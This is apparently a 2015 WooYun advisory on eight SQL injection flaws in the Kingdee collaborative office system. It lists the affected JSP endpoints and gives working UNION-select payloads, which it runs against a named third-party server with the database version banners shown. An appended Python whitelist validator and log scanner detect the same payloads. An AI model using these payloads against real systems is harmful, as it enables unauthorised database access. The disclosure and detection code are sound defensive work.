
Eight high-risk SQL injections in the Kingdee Collaborative Office System

2015-11-24 12:40

The vulnerable files are listed below; every one of them returns data directly through a UNION query:

/kingdee/tree/tree/announce/get_nodes.jsp?node=1
/kingdee/tree/tree/announce/get_selected.jsp?ids=1
/kingdee/tree/tree/discuss/get_nodes.jsp?node=1
/kingdee/tree/tree/discuss/get_selected.jsp?ids=1
/kingdee/tree/tree/news/get_nodes.jsp?node=1
/kingdee/tree/tree/news/get_selected.jsp?ids=1
/kingdee/tree/tree/rules/get_nodes.jsp?node=1
/kingdee/tree/tree/rules/get_selected.jsp?ids=1



Vulnerability PoC:

/get_nodes.jsp?node=1 union select NULL,@@version--
/get_selected.jsp?ids=1) union select NULL,@@version--



There are a great many affected instances; one is chosen here as proof.

get_nodes.jsp:
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_nodes.jsp?node=1%20union%20select%20NULL,@@version--

[{"id":"","text":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\tNov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n","announce":"","leaf":false,"node_type":"0","announce_name":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\tNov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n"},]



get_selected.jsp:
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_selected.jsp?ids=1) union select NULL,@@version--

[[,'Microsoft SQL Server 2005 - 9.00.4035.00 (X64) Nov 24 2008 16:17:31 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) '],[1,'公司公告']]



A few affected instances:


Proof of vulnerability: the get_selected.jsp request and its response shown above.


Remediation:

Filter the input.
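As an added example that is not part of the original report or of Kingdee's own code, the following Python shows what "filter the input" amounts to for these endpoints: a whitelist check that only accepts comma-separated integer ids for the node/ids parameters, reused to flag injection attempts against the listed paths in access-log lines. The log format and the sample lines are constructed assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# The endpoints from the report and the parameter each one feeds into SQL.
AFFECTED = {"get_nodes": "node", "get_selected": "ids"}
PATH_RE = re.compile(
    r"^/kingdee/tree/tree/(announce|discuss|news|rules)/(get_nodes|get_selected)\.jsp$")
# Whitelist: node/ids carry numeric ids, so accept only comma-separated integers.
ID_LIST_RE = re.compile(r"\d+(,\d+)*")

def param_is_clean(value: str) -> bool:
    """True only if the parameter is a comma-separated list of integers."""
    return ID_LIST_RE.fullmatch(value.strip()) is not None

def classify_request(url: str) -> Optional[str]:
    """'ok' or 'injection' for requests to the affected endpoints; None otherwise."""
    parts = urlsplit(url)
    m = PATH_RE.match(parts.path)
    if not m:
        return None
    param = AFFECTED[m.group(2)]
    # parse_qs percent-decodes, so "1%20union..." is checked as "1 union...".
    # A missing parameter yields an empty list, which passes (nothing reaches SQL).
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    return "ok" if all(param_is_clean(v) for v in values) else "injection"

# Common log format (constructed assumption): client ip first, request in quotes.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, request_url) for each flagged request in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and classify_request(m.group(2)) == "injection":
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed sample log lines (not taken from the report).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Nov/2015:12:40:01 +0800] "GET /kingdee/tree/tree/announce/get_nodes.jsp?node=1 HTTP/1.1" 200 512
10.0.0.7 - - [24/Nov/2015:12:40:02 +0800] "GET /kingdee/tree/tree/announce/get_nodes.jsp?node=1%20union%20select%20NULL,@@version-- HTTP/1.1" 200 830
10.0.0.7 - - [24/Nov/2015:12:40:03 +0800] "GET /kingdee/tree/tree/news/get_selected.jsp?ids=1)%20union%20select%20NULL,@@version-- HTTP/1.1" 200 640
10.0.0.9 - - [24/Nov/2015:12:40:04 +0800] "GET /kingdee/tree/tree/rules/get_selected.jsp?ids=1,2,3 HTTP/1.1" 200 300
10.0.0.9 - - [24/Nov/2015:12:40:05 +0800] "GET /kingdee/login/loginpage.jsp HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for ip, url in scan_log(SAMPLE_LOG):
        print(f"{ip} {url}")
```

The same `param_is_clean` check, applied server-side before the value is placed in the query (or, better, binding it as an integer parameter), closes the hole; the log scan only tells you who already tried.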

Source: www.wooyun.org/bugs/wooyun-2015-0136918
